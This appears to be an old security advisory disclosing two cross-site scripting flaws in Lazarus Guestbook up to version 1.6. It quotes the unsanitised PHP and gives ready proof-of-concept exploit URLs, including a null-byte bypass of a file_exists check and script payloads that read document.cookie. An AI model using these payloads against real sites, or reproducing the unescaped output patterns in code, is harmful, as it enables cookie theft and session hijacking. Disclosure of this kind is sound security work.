lazarus16.txt

`Produce : Lazarus Guestbook  
Website : http://carbonize.co.uk/Lazarus/  
Version : <= 1.6  
Problem : Cross Site Scripting  
  
1)   
The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised  
This can be exploited to execute arbitrary HTML and javascript code  
  
Vulnerable code in lang/codes-english.php near line 4  
  
1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
2 <html>  
3 <head>  
4 <title><?php echo($_GET['show']); ?></title>   
  
Exploit :   
  
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]  
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>  
  
  
2)  
the seconde probleme is in picture.php , the script verifiy fist if image file exists  
after it display it ,  
  
vulnerable code : in picture.php  
********************************  
  
24 if (!empty($_GET['img'])) {  
26 if (file_exists("$GB_TMP/$_GET[img]")) {  
27 $size = @GetImageSize("$GB_TMP/$_GET[img]");  
28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";  
29 }  
.. ............  
49 <td align="center" valign="middle">  
50 <?php  
51 if (!empty($_GET['img']) && is_array($size)) {  
52 echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";  
53 }  
54 ?>  
55 </td>   
  
****************  
if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )  
  
POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]  
  
file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed  
  
Exploit:   
  
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]  
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>  
  
Contact : simo64[at]gmail[dot]com  
Moroccan Security Research Team  
`